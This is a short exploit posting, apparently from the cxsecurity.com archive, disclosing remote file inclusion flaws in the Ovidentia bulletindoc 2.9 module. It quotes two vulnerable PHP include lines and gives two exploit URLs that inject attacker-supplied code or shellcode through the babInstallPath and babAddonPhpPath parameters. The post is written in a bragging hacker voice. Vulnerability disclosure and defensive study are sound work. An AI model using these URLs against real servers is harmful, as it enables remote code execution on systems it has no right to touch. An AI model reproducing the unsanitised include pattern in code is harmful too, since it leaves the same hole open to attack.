Ovidentia bulletindoc 2.9 Remote File Inclusion

2015.12.16
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities # Author: bd0rk # eMail: bd0rk[at]hackermail.com # Twitter: twitter.com/bd0rk # Tested on: Ubuntu-Linux # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792 PoC1: /bulletindoc-2-9/programs/admin.php line 2 ------------------------------------------------------ include $babInstallPath."admin/acl.php"; ------------------------------------------------------ [+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode] Description: The $babInstallPath-parameter isn't declared before include. So an attacker can execute evil-code 'bout this. PoC2: /bulletindoc-2-9/programs/main.php line 2 ------------------------------------------------------- require_once( $GLOBALS['babAddonPhpPath']."fonctions.php"); ------------------------------------------------------- [+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE? Description: The problem is the same as the first. -.- It's possible to compromise the system. ### The 27 years old, german hacker bd0rk ### Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top